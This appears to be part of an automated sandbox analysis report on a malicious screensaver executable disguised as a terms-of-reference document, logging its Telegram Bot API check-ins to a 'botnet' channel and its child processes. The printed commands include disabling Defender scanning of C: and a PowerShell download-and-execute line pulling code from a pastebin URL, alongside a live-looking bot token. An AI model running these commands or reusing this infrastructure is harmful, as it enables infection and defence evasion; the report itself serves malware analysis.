                                                                                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":1014,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      2192.168.2.559791149.154.167.2204431988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2025-02-17 17:58:59 UTC174OUTPOST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
                                                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      Content-Length: 138
                                                                                                                                                                                      2025-02-17 17:58:59 UTC138OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 26 74 65 78 74 3d 25 45 32 25 39 44 25 38 43 2b 46 61 69 6c 65 64 2b 74 6f 2b 64 6f 77 6e 6c 6f 61 64 2b 66 69 6c 65 2b 25 32 38 77 69 6e 33 32 5f 73 76 63 68 6f 73 74 25 32 39 25 33 41 2b 45 72 72 6f 72 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                      Data Ascii: chat_id=-1002264615855&text=%E2%9D%8C+Failed+to+download+file+%28win32_svchost%29%3A+Error%3A+An+error+occurred+while+sending+the+request.
                                                                                                                                                                                      2025-02-17 17:58:59 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:58:59 GMT
                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                      Content-Length: 446
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                      2025-02-17 17:58:59 UTC446INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 31 39 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
                                                                                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":1019,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                      3192.168.2.559790149.154.167.2204431988C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                      2025-02-17 17:58:59 UTC174OUTPOST /bot7877511610:AAFUatIaHUDXQJtLE_epVwwwm3che0AiuJY/sendMessage HTTP/1.1
                                                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                      Content-Length: 138
                                                                                                                                                                                      2025-02-17 17:58:59 UTC138OUTData Raw: 63 68 61 74 5f 69 64 3d 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 26 74 65 78 74 3d 25 45 32 25 39 44 25 38 43 2b 46 61 69 6c 65 64 2b 74 6f 2b 64 6f 77 6e 6c 6f 61 64 2b 66 69 6c 65 2b 25 32 38 77 69 6e 36 34 5f 73 76 63 68 6f 73 74 25 32 39 25 33 41 2b 45 72 72 6f 72 25 33 41 2b 41 6e 2b 65 72 72 6f 72 2b 6f 63 63 75 72 72 65 64 2b 77 68 69 6c 65 2b 73 65 6e 64 69 6e 67 2b 74 68 65 2b 72 65 71 75 65 73 74 2e
                                                                                                                                                                                      Data Ascii: chat_id=-1002264615855&text=%E2%9D%8C+Failed+to+download+file+%28win64_svchost%29%3A+Error%3A+An+error+occurred+while+sending+the+request.
                                                                                                                                                                                      2025-02-17 17:59:00 UTC388INHTTP/1.1 200 OK
                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                      Date: Mon, 17 Feb 2025 17:58:59 GMT
                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                      Content-Length: 446
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                      2025-02-17 17:59:00 UTC446INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 32 30 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61 20 5c 75 30 34 31 31 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 31 64 5c 75 30 34 31 35 5c 75 30 34 32 32 5c 75 30 34 31 30 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 32 32 36 34 36 31 35 38 35 35 2c 22 74 69 74 6c 65 22 3a 22 5c 75 30 34 31 65 5c 75 30 34 32 32 5c 75 30 34 32 31 5c 75 30 34 32 32 5c 75 30 34 32 33 5c 75 30 34 31 61
                                                                                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":1020,"sender_chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a \u0411\u041e\u0422\u041d\u0415\u0422\u0410","type":"channel"},"chat":{"id":-1002264615855,"title":"\u041e\u0422\u0421\u0422\u0423\u041a


                                                                                                                                                                                      Statistics

                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                      Behavior

                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                      System Behavior

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                      Start time:12:57:08
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"
                                                                                                                                                                                      Imagebase:0x7ff6a79c0000
                                                                                                                                                                                      File size:38'551'524 bytes
                                                                                                                                                                                      MD5 hash:C364BCDCA858DBB480E269B7C0C0DEDC
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                      Start time:12:57:09
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                      Start time:12:57:09
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                      Start time:12:57:09
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                      Start time:12:57:09
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                      Start time:12:57:12
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"
                                                                                                                                                                                      Imagebase:0x7ff661920000
                                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                      Start time:12:57:13
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"
                                                                                                                                                                                      Imagebase:0x7ff71a1d0000
                                                                                                                                                                                      File size:52'744 bytes
                                                                                                                                                                                      MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                      Start time:12:57:23
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      General

                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                      Start time:12:57:23
                                                                                                                                                                                      Start date:17/02/2025
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                      Disassembly

                                                                                                                                                                                      Reset < >